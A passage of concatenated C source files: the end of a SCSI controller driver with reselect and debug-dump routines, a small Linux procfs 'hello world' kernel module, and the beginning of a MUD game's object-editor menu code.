dev->sc_msg[0] & 7; } else { printf("RSLT_NI - not MESG_IN_PHASE %x\n", csr); } } } #ifdef DEBUG if(reselect_debug>1 || (reselect_debug && csr==SBIC_CSR_RSLT_NI)) printf("sbicnext: reselect %s from targ %d lun %d\n", csr == SBIC_CSR_RSLT_NI ? "NI" : "IFY", newtarget, newlun); #endif if (dev->sc_nexus) { #ifdef DEBUG if (reselect_debug > 1) printf("%s: reselect %s with active command\n", dev->sc_dev.dv_xname, csr == SBIC_CSR_RSLT_NI ? 
"NI" : "IFY"); #ifdef DDB /* Debugger();*/ #endif #endif TAILQ_INSERT_HEAD(&dev->ready_list, dev->sc_nexus, chain); dev->sc_tinfo[dev->target].lubusy &= ~(1 << dev->lun); dev->sc_nexus = NULL; dev->sc_xs = NULL; } /* Reload sync values for this target */ if (dev->sc_sync[newtarget].state == SYNC_DONE) SET_SBIC_syn(regs, SBIC_SYN (dev->sc_sync[newtarget].offset, dev->sc_sync[newtarget].period)); else SET_SBIC_syn(regs, SBIC_SYN (0, sbic_min_period)); for (acb = dev->nexus_list.tqh_first; acb; acb = acb->chain.tqe_next) { if (acb->xs->sc_link->scsipi_scsi.target != newtarget || acb->xs->sc_link->scsipi_scsi.lun != newlun) continue; TAILQ_REMOVE(&dev->nexus_list, acb, chain); dev->sc_nexus = acb; dev->sc_xs = acb->xs; dev->sc_flags |= SBICF_SELECTED; dev->target = newtarget; dev->lun = newlun; break; } if (acb == NULL) { printf("%s: reselect %s targ %d not in nexus_list %p\n", dev->sc_dev.dv_xname, csr == SBIC_CSR_RSLT_NI ? "NI" : "IFY", newtarget, &dev->nexus_list.tqh_first); panic("bad reselect in sbic"); } if (csr == SBIC_CSR_RSLT_IFY) SET_SBIC_cmd(regs, SBIC_CMD_CLR_ACK); break; default: abort: /* * Something unexpected happened -- deal with it. */ printf("sbicnextstate: aborting csr %02x asr %02x\n", csr, asr); #ifdef DDB Debugger(); #endif #ifdef DEBUG if( data_pointer_debug > 1 ) printf("next dmastop: %d(%p:%lx)\n", dev->target,dev->sc_cur->dc_addr,dev->sc_tcnt); dev->sc_dmatimo = 0; #endif dev->sc_dmastop(dev); SET_SBIC_control(regs, SBIC_CTL_EDI | SBIC_CTL_IDI); sbicerror(dev, regs, csr); sbicabort(dev, regs, "next"); if (dev->sc_flags & SBICF_INDMA) { /* * check for overlapping cache line, flush if so */ #ifdef M68040 if (dev->sc_flags & SBICF_DCFLUSH) { #if 0 printf("sibc: 68040 DMA cache flush needs fixing? %x:%x\n", dev->sc_xs->data, dev->sc_xs->datalen); #endif } #endif dev->sc_flags &= ~(SBICF_INDMA | SBICF_DCFLUSH); #ifdef DEBUG if( data_pointer_debug > 1 ) printf("next dmastop: %d(%p:%lx)\n", dev->target,dev->sc_cur->dc_addr,dev->sc_tcnt); dev->sc_dmatimo = 0; #endif dev->sc_dmastop(dev); sbic_scsidone(acb, -1); } SBIC_TRACE(dev); return SBIC_STATE_ERROR; } SBIC_TRACE(dev); return(SBIC_STATE_RUNNING); } /* * Check if DMA can not be used with specified buffer */ int sbiccheckdmap(bp, len, mask) void *bp; u_long len, mask; { u_char *buffer; u_long phy_buf; u_long phy_len; buffer = bp; if (len == 0) return(0); while (len) { phy_buf = kvtop(buffer); if (len < (phy_len = NBPG - ((int) buffer & PGOFSET))) phy_len = len; if (phy_buf & mask) return(1); buffer += phy_len; len -= phy_len; } return(0); } int sbictoscsiperiod(dev, regs, a) struct sbic_softc *dev; sbic_regmap_p regs; int a; { unsigned int fs; /* * cycle = DIV / (2*CLK) * DIV = FS+2 * best we can do is 200ns at 20Mhz, 2 cycles */ GET_SBIC_myid(regs,fs); fs = (fs >>6) + 2; /* DIV */ fs = (fs * 10000) / (dev->sc_clkfreq<<1); /* Cycle, in ns */ if (a < 2) a = 8; /* map to Cycles */ return ((fs*a)>>2); /* in 4 ns units */ } int sbicfromscsiperiod(dev, regs, p) struct sbic_softc *dev; sbic_regmap_p regs; int p; { register unsigned int fs, ret; /* Just the inverse of the above */ GET_SBIC_myid(regs,fs); fs = (fs >>6) + 2; /* DIV */ fs = (fs * 10000) / (dev->sc_clkfreq<<1); /* Cycle, in ns */ ret = p << 2; /* in ns units */ ret = ret / fs; /* in Cycles */ if (ret < sbic_min_period) return(sbic_min_period); /* verify rounding */ if (sbictoscsiperiod(dev, regs, ret) < p) ret++; return (ret >= 8) ? 
0 : ret; } #ifdef DEBUG void sbicdumpstate() { u_char csr, asr; GET_SBIC_asr(debug_sbic_regs,asr); GET_SBIC_csr(debug_sbic_regs,csr); printf("%s: asr:csr(%02x:%02x)->(%02x:%02x)\n", (routine==1)?"sbicgo": (routine==2)?"sbicintr": (routine==3)?"sbicicmd": (routine==4)?"sbicnext":"unknown", debug_asr, debug_csr, asr, csr); } void sbictimeout(dev) struct sbic_softc *dev; { int s, asr; s = splbio(); if (dev->sc_dmatimo) { if (dev->sc_dmatimo > 1) { printf("%s: dma timeout #%d\n", dev->sc_dev.dv_xname, dev->sc_dmatimo - 1); GET_SBIC_asr(dev->sc_sbicp, asr); if( asr & SBIC_ASR_INT ) { /* We need to service a missed IRQ */ printf("Servicing a missed int:(%02x,%02x)->(%02x,??)\n", debug_asr, debug_csr, asr); sbicintr(dev); } sbicdumpstate(); } dev->sc_dmatimo++; } splx(s); timeout((void *)sbictimeout, dev, 30 * hz); } void sbic_dump_acb(acb) struct sbic_acb *acb; { u_char *b = (u_char *) &acb->cmd; int i; printf("acb@%p ", acb); if (acb->xs == NULL) { printf("<unused>\n"); return; } printf("(%d:%d) flags %2x clen %2d cmd ", acb->xs->sc_link->scsipi_scsi.target, acb->xs->sc_link->scsipi_scsi.lun, acb->flags, acb->clen); for (i = acb->clen; i; --i) printf(" %02x", *b++); printf("\n"); printf(" xs: %8p data %8p:%04x ", acb->xs, acb->xs->data, acb->xs->datalen); printf("va %8p:%04x ", acb->sc_kv.dc_addr, acb->sc_kv.dc_count); printf("pa %8p:%04x tcnt %lx\n", acb->sc_pa.dc_addr, acb->sc_pa.dc_count ,acb->sc_tcnt); } void sbic_dump(dev) struct sbic_softc *dev; { sbic_regmap_p regs; u_char csr, asr; struct sbic_acb *acb; int s; int i; s = splbio(); regs = dev->sc_sbicp; #if CSR_TRACE_SIZE printf("csr trace: "); i = csr_traceptr; do { printf("%c%02x%02x%02x ", csr_trace[i].whr, csr_trace[i].csr, csr_trace[i].asr, csr_trace[i].xtn); switch(csr_trace[i].whr) { case 'g': printf("go "); break; case 's': printf("select "); break; case 'y': printf("select+ "); break; case 'i': printf("intr "); break; case 'f': printf("finish "); break; case '>': printf("out "); break; case '<': printf("in "); break; case 'm': printf("msgin "); break; case 'x': printf("msginx "); break; case 'X': printf("msginX "); break; case 'r': printf("reselect "); break; case 'I': printf("icmd "); break; case 'a': printf("abort "); break; default: printf("? 
"); } switch(csr_trace[i].csr) { case 0x11: printf("INITIATOR"); break; case 0x16: printf("S_XFERRED"); break; case 0x20: printf("MSGIN_ACK"); break; case 0x41: printf("DISC"); break; case 0x42: printf("SEL_TIMEO"); break; case 0x80: printf("RSLT_NI"); break; case 0x81: printf("RSLT_IFY"); break; case 0x85: printf("DISC_1"); break; case 0x18: case 0x19: case 0x1a: case 0x1b: case 0x1e: case 0x1f: case 0x28: case 0x29: case 0x2a: case 0x2b: case 0x2e: case 0x2f: case 0x48: case 0x49: case 0x4a: case 0x4b: case 0x4e: case 0x4f: case 0x88: case 0x89: case 0x8a: case 0x8b: case 0x8e: case 0x8f: switch(csr_trace[i].csr & 0xf0) { case 0x10: printf("DONE_"); break; case 0x20: printf("STOP_"); break; case 0x40: printf("ERR_"); break; case 0x80: printf("REQ_"); break; } switch(csr_trace[i].csr & 7) { case 0: printf("DATA_OUT"); break; case 1: printf("DATA_IN"); break; case 2: printf("CMD"); break; case 3: printf("STATUS"); break; case 6: printf("MSG_OUT"); break; case 7: printf("MSG_IN"); break; default: printf("invld phs"); } break; default: printf("****"); break; } if (csr_trace[i].asr & SBIC_ASR_INT) printf(" ASR_INT"); if (csr_trace[i].asr & SBIC_ASR_LCI) printf(" ASR_LCI"); if (csr_trace[i].asr & SBIC_ASR_BSY) printf(" ASR_BSY"); if (csr_trace[i].asr & SBIC_ASR_CIP) printf(" ASR_CIP"); printf("\n"); i = (i + 1) & (CSR_TRACE_SIZE - 1); } while (i != csr_traceptr); #endif GET_SBIC_asr(regs, asr); if ((asr & SBIC_ASR_INT) == 0) GET_SBIC_csr(regs, csr); else csr = 0; printf("%s@%p regs %p asr %x csr %x\n", dev->sc_dev.dv_xname, dev, regs, asr, csr); if ((acb = dev->free_list.tqh_first)) { printf("Free list:\n"); while (acb) { sbic_dump_acb(acb); acb = acb->chain.tqe_next; } } if ((acb = dev->ready_list.tqh_first)) { printf("Ready list:\n"); while (acb) { sbic_dump_acb(acb); acb = acb->chain.tqe_next; } } if ((acb = dev->nexus_list.tqh_first)) { printf("Nexus list:\n"); while (acb) { sbic_dump_acb(acb); acb = acb->chain.tqe_next; } } if (dev->sc_nexus) { printf("nexus:\n"); sbic_dump_acb(dev->sc_nexus); } printf("sc_xs %p targ %d lun %d flags %x tcnt %lx dmacmd %x mask %lx\n", dev->sc_xs, dev->target, dev->lun, dev->sc_flags, dev->sc_tcnt, dev->sc_dmacmd, dev->sc_dmamask); for (i = 0; i < 8; ++i) { if (dev->sc_tinfo[i].cmds > 2) { printf("tgt %d: cmds %d disc %d senses %d lubusy %x\n", i, dev->sc_tinfo[i].cmds, dev->sc_tinfo[i].dconns, dev->sc_tinfo[i].senses, dev->sc_tinfo[i].lubusy); } } splx(s); } #endif
600034.c
/*
 * procfs1.c
 */
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/proc_fs.h>
#include <linux/uaccess.h>
#include <linux/version.h>

#if LINUX_VERSION_CODE >= KERNEL_VERSION(5, 6, 0)
#define HAVE_PROC_OPS
#endif

#define procfs_name "helloworld"

static struct proc_dir_entry *our_proc_file;

static ssize_t procfile_read(struct file *filePointer, char __user *buffer,
                             size_t buffer_length, loff_t *offset)
{
    char s[13] = "HelloWorld!\n";
    int len = sizeof(s) - 1; /* don't hand the trailing NUL to the reader */
    ssize_t ret = len;

    if (*offset >= len) {
        ret = 0; /* everything already delivered: signal EOF */
    } else if (copy_to_user(buffer, s, len)) {
        pr_info("copy_to_user failed\n");
        ret = -EFAULT;
    } else {
        pr_info("procfile read %s\n", filePointer->f_path.dentry->d_name.name);
        *offset += len;
    }

    return ret;
}

#ifdef HAVE_PROC_OPS
static const struct proc_ops proc_file_fops = {
    .proc_read = procfile_read,
};
#else
static const struct file_operations proc_file_fops = {
    .read = procfile_read,
};
#endif

static int __init procfs1_init(void)
{
    our_proc_file = proc_create(procfs_name, 0644, NULL, &proc_file_fops);
    if (NULL == our_proc_file) {
        pr_alert("Error: Could not initialize /proc/%s\n", procfs_name);
        return -ENOMEM;
    }

    pr_info("/proc/%s created\n", procfs_name);
    return 0;
}

static void __exit procfs1_exit(void)
{
    proc_remove(our_proc_file);
    pr_info("/proc/%s removed\n", procfs_name);
}

module_init(procfs1_init);
module_exit(procfs1_exit);

MODULE_LICENSE("GPL");
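/*
 * Usage sketch (assumes the module is built as procfs1.ko with the usual
 * out-of-tree kbuild makefile; the shell session below is illustrative):
 *
 *   $ sudo insmod procfs1.ko
 *   $ cat /proc/helloworld
 *   HelloWorld!
 *   $ sudo rmmod procfs1
 */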
440266.c
/************************************************************************** * File: oedit.c Part of LuminariMUD * * Usage: Oasis OLC - Objects. * * * * By Levork. Copyright 1996 Harvey Gilpin. 1997-2001 George Greer. * **************************************************************************/ #include "conf.h" #include "sysdep.h" #include "structs.h" #include "utils.h" #include "comm.h" #include "interpreter.h" #include "spells.h" #include "db.h" #include "boards.h" #include "constants.h" #include "shop.h" #include "genolc.h" #include "genobj.h" #include "genzon.h" #include "oasis.h" #include "improved-edit.h" #include "dg_olc.h" #include "fight.h" #include "modify.h" #include "clan.h" #include "craft.h" #include "spec_abilities.h" #include "feats.h" #include "assign_wpn_armor.h" #include "domains_schools.h" #include "treasure.h" /* set_weapon_object */ #include "act.h" /* get_eq_score() */ /* local functions */ static void oedit_disp_size_menu(struct descriptor_data *d); static void oedit_setup_new(struct descriptor_data *d); static void oedit_disp_container_flags_menu(struct descriptor_data *d); static void oedit_disp_extradesc_menu(struct descriptor_data *d); static void oedit_disp_weapon_spells(struct descriptor_data *d); static void oedit_disp_prompt_apply_menu(struct descriptor_data *d); //static void oedit_disp_apply_spec_menu(struct descriptor_data *d); static void oedit_liquid_type(struct descriptor_data *d); static void oedit_disp_apply_menu(struct descriptor_data *d); //static void oedit_disp_weapon_menu(struct descriptor_data *d); static void oedit_disp_spells_menu(struct descriptor_data *d); static void oedit_disp_val1_menu(struct descriptor_data *d); static void oedit_disp_val2_menu(struct descriptor_data *d); static void oedit_disp_val3_menu(struct descriptor_data *d); static void oedit_disp_val4_menu(struct descriptor_data *d); static void oedit_disp_val5_menu(struct descriptor_data *d); //static void oedit_disp_prof_menu(struct descriptor_data *d); static void oedit_disp_mats_menu(struct descriptor_data *d); static void oedit_disp_type_menu(struct descriptor_data *d); static void oedit_disp_extra_menu(struct descriptor_data *d); static void oedit_disp_wear_menu(struct descriptor_data *d); static void oedit_disp_menu(struct descriptor_data *d); static void oedit_disp_perm_menu(struct descriptor_data *d); static void oedit_save_to_disk(int zone_num); static void oedit_disp_spellbook_menu(struct descriptor_data *d); static void oedit_disp_weapon_special_abilities_menu(struct descriptor_data *d); static void oedit_disp_assign_weapon_specab_menu(struct descriptor_data *d); /* handy macro */ #define S_PRODUCT(s, i) ((s)->producing[(i)]) /* Utility and exported functions */ ACMD(do_oasis_oedit) { int number = NOWHERE, save = 0, real_num; struct descriptor_data *d; char *buf3; char buf1[MAX_STRING_LENGTH]; char buf2[MAX_STRING_LENGTH]; /* No building as a mob or while being forced. */ if (IS_NPC(ch) || !ch->desc || STATE(ch->desc) != CON_PLAYING) return; /* Parse any arguments. */ buf3 = two_arguments(argument, buf1, buf2); /* If there aren't any arguments they can't modify anything. */ if (!*buf1) { send_to_char(ch, "Specify an object VNUM to edit.\r\n"); return; } else if (!isdigit(*buf1)) { if (str_cmp("save", buf1) != 0) { send_to_char(ch, "Yikes! 
Stop that, someone will get hurt!\r\n"); return; } save = TRUE; if (is_number(buf2)) number = atoi(buf2); else if (GET_OLC_ZONE(ch) > 0) { zone_rnum zlok; if ((zlok = real_zone(GET_OLC_ZONE(ch))) == NOWHERE) number = NOWHERE; else number = genolc_zone_bottom(zlok); } if (number == NOWHERE) { send_to_char(ch, "Save which zone?\r\n"); return; } } /* If a numeric argument was given, get it. */ if (number == NOWHERE) number = atoi(buf1); /* Check that whatever it is isn't already being edited. */ for (d = descriptor_list; d; d = d->next) { if (STATE(d) == CON_OEDIT) { if (d->olc && OLC_NUM(d) == number) { send_to_char(ch, "That object is currently being edited by %s.\r\n", PERS(d->character, ch)); return; } } } /* Point d to the builder's descriptor (for easier typing later). */ d = ch->desc; /* Give the descriptor an OLC structure. */ if (d->olc) { mudlog(BRF, LVL_IMMORT, TRUE, "SYSERR: do_oasis: Player already had olc structure."); free(d->olc); } CREATE(d->olc, struct oasis_olc_data, 1); /* Find the zone. */ OLC_ZNUM(d) = save ? real_zone(number) : real_zone_by_thing(number); if (OLC_ZNUM(d) == NOWHERE) { send_to_char(ch, "Sorry, there is no zone for that number!\r\n"); /* Free the descriptor's OLC structure. */ free(d->olc); d->olc = NULL; return; } /* Everyone but IMPLs can only edit zones they have been assigned. */ if (!can_edit_zone(ch, OLC_ZNUM(d))) { send_cannot_edit(ch, zone_table[OLC_ZNUM(d)].number); /* Free the OLC structure. */ free(d->olc); d->olc = NULL; return; } /* If we need to save, save the objects. */ if (save) { send_to_char(ch, "Saving all objects in zone %d.\r\n", zone_table[OLC_ZNUM(d)].number); mudlog(CMP, MAX(LVL_BUILDER, GET_INVIS_LEV(ch)), TRUE, "OLC: %s saves object info for zone %d.", GET_NAME(ch), zone_table[OLC_ZNUM(d)].number); /* Save the objects in this zone. */ save_objects(OLC_ZNUM(d)); /* Free the descriptor's OLC structure. */ free(d->olc); d->olc = NULL; return; } OLC_NUM(d) = number; /* If a new object, setup new, otherwise setup the existing object. */ if ((real_num = real_object(number)) != NOTHING) oedit_setup_existing(d, real_num); else oedit_setup_new(d); oedit_disp_menu(d); STATE(d) = CON_OEDIT; /* Send the OLC message to the players in the same room as the builder. */ act("$n starts using OLC.", TRUE, d->character, 0, 0, TO_ROOM); SET_BIT_AR(PLR_FLAGS(ch), PLR_WRITING); /* Log the OLC message. */ mudlog(CMP, LVL_IMMORT, TRUE, "OLC: %s starts editing zone %d allowed zone %d", GET_NAME(ch), zone_table[OLC_ZNUM(d)].number, GET_OLC_ZONE(ch)); } static void oedit_setup_new(struct descriptor_data *d) { CREATE(OLC_OBJ(d), struct obj_data, 1); clear_object(OLC_OBJ(d)); OLC_OBJ(d)->name = strdup("unfinished object"); OLC_OBJ(d)->description = strdup("An unfinished object is lying here."); OLC_OBJ(d)->short_description = strdup("an unfinished object"); SET_BIT_AR(GET_OBJ_WEAR(OLC_OBJ(d)), ITEM_WEAR_TAKE); GET_OBJ_BOUND_ID(OLC_OBJ(d)) = NOBODY; OLC_VAL(d) = 0; OLC_ITEM_TYPE(d) = OBJ_TRIGGER; GET_OBJ_MATERIAL(OLC_OBJ(d)) = 0; GET_OBJ_PROF(OLC_OBJ(d)) = 0; GET_OBJ_SIZE(OLC_OBJ(d)) = SIZE_MEDIUM; SCRIPT(OLC_OBJ(d)) = NULL; OLC_OBJ(d)->proto_script = OLC_SCRIPT(d) = NULL; OLC_SPECAB(d) = NULL; } void oedit_setup_existing(struct descriptor_data *d, int real_num) { struct obj_data *obj; /* Allocate object in memory. */ CREATE(obj, struct obj_data, 1); copy_object(obj, &obj_proto[real_num]); /* Attach new object to player's descriptor. 
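 * All editing happens on this private copy; the prototype in obj_proto
 * is only updated when the builder saves (see oedit_save_internally()).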
*/ OLC_OBJ(d) = obj; OLC_VAL(d) = 0; OLC_ITEM_TYPE(d) = OBJ_TRIGGER; dg_olc_script_copy(d); /* The edited obj must not have a script. It will be assigned to the updated * obj later, after editing. */ SCRIPT(obj) = NULL; OLC_OBJ(d)->proto_script = NULL; } void oedit_save_internally(struct descriptor_data *d) { int i; obj_rnum robj_num; struct descriptor_data *dsc; struct obj_data *obj; i = (real_object(OLC_NUM(d)) == NOTHING); if ((robj_num = add_object(OLC_OBJ(d), OLC_NUM(d))) == NOTHING) { log("oedit_save_internally: add_object failed."); return; } /* Update triggers and free old proto list */ if (obj_proto[robj_num].proto_script && obj_proto[robj_num].proto_script != OLC_SCRIPT(d)) free_proto_script(&obj_proto[robj_num], OBJ_TRIGGER); /* this will handle new instances of the object: */ obj_proto[robj_num].proto_script = OLC_SCRIPT(d); /* this takes care of the objects currently in-game */ for (obj = object_list; obj; obj = obj->next) { if (obj->item_number != robj_num) continue; /* remove any old scripts */ if (SCRIPT(obj)) extract_script(obj, OBJ_TRIGGER); free_proto_script(obj, OBJ_TRIGGER); copy_proto_script(&obj_proto[robj_num], obj, OBJ_TRIGGER); assign_triggers(obj, OBJ_TRIGGER); } /* end trigger update */ if (!i) /* If it's not a new object, don't renumber. */ return; /* Renumber produce in shops being edited. */ for (dsc = descriptor_list; dsc; dsc = dsc->next) if (STATE(dsc) == CON_SEDIT) for (i = 0; S_PRODUCT(OLC_SHOP(dsc), i) != NOTHING; i++) if (S_PRODUCT(OLC_SHOP(dsc), i) >= robj_num) S_PRODUCT(OLC_SHOP(dsc), i) ++; /* Update other people in zedit too. From: C.Raehl 4/27/99 */ for (dsc = descriptor_list; dsc; dsc = dsc->next) if (STATE(dsc) == CON_ZEDIT) for (i = 0; OLC_ZONE(dsc)->cmd[i].command != 'S'; i++) switch (OLC_ZONE(dsc)->cmd[i].command) { case 'P': OLC_ZONE(dsc)->cmd[i].arg3 += (OLC_ZONE(dsc)->cmd[i].arg3 >= robj_num); /* Fall through. */ case 'E': case 'G': case 'O': OLC_ZONE(dsc)->cmd[i].arg1 += (OLC_ZONE(dsc)->cmd[i].arg1 >= robj_num); break; case 'R': OLC_ZONE(dsc)->cmd[i].arg2 += (OLC_ZONE(dsc)->cmd[i].arg2 >= robj_num); break; default: break; } } static void oedit_save_to_disk(int zone_num) { save_objects(zone_num); } void oedit_disp_weapon_spells(struct descriptor_data *d) { char buf[MAX_INPUT_LENGTH]; int counter; get_char_colors(d->character); clear_screen(d); for (counter = 0; counter < MAX_WEAPON_SPELLS; counter++) { snprintf(buf, sizeof(buf), "[%s%d%s] Spell: %s%20s%s Level: %s%3d%s Percent: %s%3d%s Combat: %s%3d%s\r\n", cyn, counter + 1, nrm, cyn, spell_info[OLC_OBJ(d)->wpn_spells[counter].spellnum].name, nrm, cyn, OLC_OBJ(d)->wpn_spells[counter].level, nrm, cyn, OLC_OBJ(d)->wpn_spells[counter].percent, nrm, cyn, OLC_OBJ(d)->wpn_spells[counter].inCombat, nrm); send_to_char(d->character, "%s", buf); } send_to_char(d->character, "Enter spell to edit : "); } static void oedit_disp_lootbox_levels(struct descriptor_data *d) { write_to_output(d, "This will determine the maximum bonus to be found on the items in the chest.\r\n" "Please choose the maximum grade of equipment that can drop from this chest.\r\n" "1) Mundane\r\n" "2) Minor (level 10 or less)\r\n" "3) Typical (level 15 or less)\r\n" "4) Medium (level 20 or less)\r\n" "5) Major (level 25 or less)\r\n" "6) Superior (level 26 or higher)\r\n" "\r\nYour Choice: "); } static void oedit_disp_lootbox_types(struct descriptor_data *d) { write_to_output(d, "The type guarantees one item of the specified type.\r\n" "Generic has equal chance for any type.
Gold provides 5x as much money.\r\n" "Please choose the type of lootbox you'd like to create:\r\n" "1) Generic, equal chance for all item types.\r\n" "2) Weapons, guaranteed weapon, low chance for other items.\r\n" "3) Armor, guaranteed armor, low chance for other items.\r\n" "4) Consumables, guaranteed at least one consumable, low chance for other items.\r\n" "5) Trinkets, guaranteed trinket (rings, bracers, etc), low chance for other items.\r\n" "6) Gold, much more gold, low chance for other items.\r\n" "7) Crystal, guaranteed arcanite crystal, low chance for other items.\r\n" "\r\nYour Choice: "); } /* Menu functions */ /* For container flags. */ static void oedit_disp_container_flags_menu(struct descriptor_data *d) { char bits[MAX_STRING_LENGTH]; get_char_colors(d->character); clear_screen(d); sprintbit(GET_OBJ_VAL(OLC_OBJ(d), 1), container_bits, bits, sizeof(bits)); write_to_output(d, "%s1%s) CLOSEABLE\r\n" "%s2%s) PICKPROOF\r\n" "%s3%s) CLOSED\r\n" "%s4%s) LOCKED\r\n" "Container flags: %s%s%s\r\n" "Enter flag, 0 to quit : ", grn, nrm, grn, nrm, grn, nrm, grn, nrm, cyn, bits, nrm); } /* For extra descriptions. */ static void oedit_disp_extradesc_menu(struct descriptor_data *d) { struct extra_descr_data *extra_desc = OLC_DESC(d); get_char_colors(d->character); clear_screen(d); write_to_output(d, "Extra desc menu\r\n" "%s1%s) Keywords: %s%s\r\n" "%s2%s) Description:\r\n%s%s\r\n" "%s3%s) Goto next description: %s\r\n" "%s0%s) Quit\r\n" "Enter choice : ", grn, nrm, yel, (extra_desc->keyword && *extra_desc->keyword) ? extra_desc->keyword : "<NONE>", grn, nrm, yel, (extra_desc->description && *extra_desc->description) ? extra_desc->description : "<NONE>", grn, nrm, !extra_desc->next ? "Not set." : "Set.", grn, nrm); OLC_MODE(d) = OEDIT_EXTRADESC_MENU; } /* Ask for the bonus type for this apply. */ static void oedit_disp_apply_prompt_bonus_type_menu(struct descriptor_data *d) { int i = 0; for (i = 0; i < NUM_BONUS_TYPES; i++) { write_to_output(d, " %s%2d%s) %-20s", nrm, i, nrm, bonus_types[i]); if (((i + 1) % 3) == 0) write_to_output(d, "\r\n"); } write_to_output(d, "\r\nEnter the bonus type for this affect : "); OLC_MODE(d) = OEDIT_APPLY_BONUS_TYPE; } /* Ask for *which* apply to edit. */ static void oedit_disp_prompt_apply_menu(struct descriptor_data *d) { char apply_buf[MAX_STRING_LENGTH]; int counter; get_char_colors(d->character); clear_screen(d); for (counter = 0; counter < MAX_OBJ_AFFECT; counter++) { if (OLC_OBJ(d)->affected[counter].modifier) { sprinttype(OLC_OBJ(d)->affected[counter].location, apply_types, apply_buf, sizeof(apply_buf)); if (OLC_OBJ(d)->affected[counter].location == APPLY_FEAT) { write_to_output(d, " %s%d%s) Grant Feat %s (%s)\r\n", grn, counter + 1, nrm, feat_list[(OLC_OBJ(d)->affected[counter].modifier < NUM_FEATS && OLC_OBJ(d)->affected[counter].modifier > 0 ? OLC_OBJ(d)->affected[counter].modifier : 0)] .name, bonus_types[OLC_OBJ(d)->affected[counter].bonus_type]); } else { write_to_output(d, " %s%d%s) %+d to %s (%s)\r\n", grn, counter + 1, nrm, OLC_OBJ(d)->affected[counter].modifier, apply_buf, bonus_types[OLC_OBJ(d)->affected[counter].bonus_type]); } } else { write_to_output(d, " %s%d%s) None.\r\n", grn, counter + 1, nrm); } } write_to_output(d, "\r\nEnter affection to modify (0 to quit) : "); OLC_MODE(d) = OEDIT_PROMPT_APPLY; } void oedit_disp_prompt_spellbook_menu(struct descriptor_data *d) { int counter, columns, i, u = 0; clear_screen(d); for (i = 1; i <= 9; i++) { columns = 0; write_to_output(d, "%s", !(columns % 3) ?
"\r\n" : ""); write_to_output(d, "---Circle %d Spells---===============================================---\r\n", i); for (counter = 0; counter < SPELLBOOK_SIZE; counter++) { if (OLC_OBJ(d)->sbinfo && OLC_OBJ(d)->sbinfo[counter].spellname != 0 && OLC_OBJ(d)->sbinfo[counter].spellname < MAX_SPELLS && ((spell_info[OLC_OBJ(d)->sbinfo[counter].spellname].min_level[CLASS_WIZARD] + 1) / 2) == i) { write_to_output(d, " %3d) %-20.20s %s", counter + 1, spell_info[OLC_OBJ(d)->sbinfo[counter].spellname].name, !(++columns % 3) ? "\r\n" : ""); u++; } } } u++; if (u > SPELLBOOK_SIZE) { write_to_output(d, "\r\nEnter spell slot to modify (0 to quit) : "); } else { write_to_output(d, "\r\nEnter spell slot to modify [ next empty slot is %2d ] (0 to quit) : ", u); } OLC_MODE(d) = OEDIT_PROMPT_SPELLBOOK; } void oedit_disp_spellbook_menu(struct descriptor_data *d) { int counter, columns, i; clear_screen(d); for (i = 1; i <= 9; i++) { columns = 0; write_to_output(d, "%s", !(columns % 3) ? "\n" : ""); write_to_output(d, "---Circle %d Spells---==============================================---\r\n", i); for (counter = 0; counter < NUM_SPELLS; counter++) { if (((spell_info[counter].min_level[CLASS_WIZARD] + 1) / 2) == i && spell_info[counter].schoolOfMagic != NOSCHOOL) write_to_output(d, "%3d) %-20.20s%s", counter, spell_info[counter].name, !(++columns % 3) ? "\r\n" : ""); } } write_to_output(d, "\r\nEnter spell number (0 is no spell) : "); OLC_MODE(d) = OEDIT_SPELLBOOK; } static void oedit_disp_weapon_special_abilities_menu(struct descriptor_data *d) { struct obj_special_ability *specab; bool found = FALSE; char actmtds[MAX_STRING_LENGTH]; int counter = 0; get_char_colors(d->character); clear_screen(d); write_to_output(d, "Weapon special abilities menu\r\n"); for (specab = OLC_OBJ(d)->special_abilities; specab != NULL; specab = specab->next) { counter++; found = TRUE; sprintbit(specab->activation_method, activation_methods, actmtds, MAX_STRING_LENGTH); write_to_output(d, "%s%d%s) Ability: %s%s%s Level: %s%d%s\r\n" " Activation Methods: %s%s%s\r\n" " CommandWord: %s%s%s\r\n" " Values: [%s%d%s] [%s%d%s] [%s%d%s] [%s%d%s]\r\n", grn, counter, nrm, yel, special_ability_info[specab->ability].name, nrm, yel, specab->level, nrm, yel, actmtds, nrm, yel, (specab->command_word == NULL ? "Not set." : specab->command_word), nrm, yel, specab->value[0], nrm, yel, specab->value[1], nrm, yel, specab->value[2], nrm, yel, specab->value[3], nrm); } if (!found) write_to_output(d, "No weapon special abilities assigned.\r\n"); write_to_output(d, "\r\n" "%sN%s) Assign a new ability\r\n" "%sE%s) Edit an assigned ability\r\n" "%sD%s) Delete an assigned ability\r\n" "%sQ%s) Quit\r\n" "Enter choice : ", grn, nrm, grn, nrm, grn, nrm, grn, nrm); OLC_MODE(d) = OEDIT_WEAPON_SPECAB_MENU; } static void oedit_disp_assign_weapon_specab_menu(struct descriptor_data *d) { struct obj_special_ability *specab; char actmtds[MAX_STRING_LENGTH]; specab = OLC_SPECAB(d); if (specab == NULL) { write_to_output(d, "Could not retrieve new weapon special ability. 
Exiting.\r\n"); oedit_disp_menu(d); return; } get_char_colors(d->character); clear_screen(d); write_to_output(d, "Weapon special abilities menu\r\n"); sprintbit(OLC_SPECAB(d)->activation_method, activation_methods, actmtds, MAX_STRING_LENGTH); write_to_output(d, "%sA%s) Ability: %s%s%s\r\n" "%sL%s) Level: %s%d%s\r\n" "%sM%s) Activation Methods: %s%s%s\r\n" "%sC%s) Command Word: %s%s%s\r\n" "%sV%s) Values: [%s%d%s] [%s%d%s] [%s%d%s] [%s%d%s]\r\n" "%sQ%s) Quit\r\n" "Enter Choice : ", grn, nrm, yel, special_ability_info[specab->ability].name, nrm, grn, nrm, yel, specab->level, nrm, grn, nrm, yel, actmtds, nrm, grn, nrm, yel, (specab->command_word == NULL ? "Not set." : specab->command_word), nrm, grn, nrm, yel, specab->value[0], nrm, yel, specab->value[1], nrm, yel, specab->value[2], nrm, yel, specab->value[3], nrm, grn, nrm); OLC_MODE(d) = OEDIT_ASSIGN_WEAPON_SPECAB_MENU; } static void oedit_weapon_specab(struct descriptor_data *d) { const char *specab_names[NUM_SPECABS - 1]; /* We are ignoring the first, 0 value. */ int i = 0; get_char_colors(d->character); clear_screen(d); /* we want to use column_list here, but we don't have a pre made list * of string values. Make one, and make sure it is in order. */ for (i = 0; i < NUM_SPECABS - 1; i++) { specab_names[i] = special_ability_info[i + 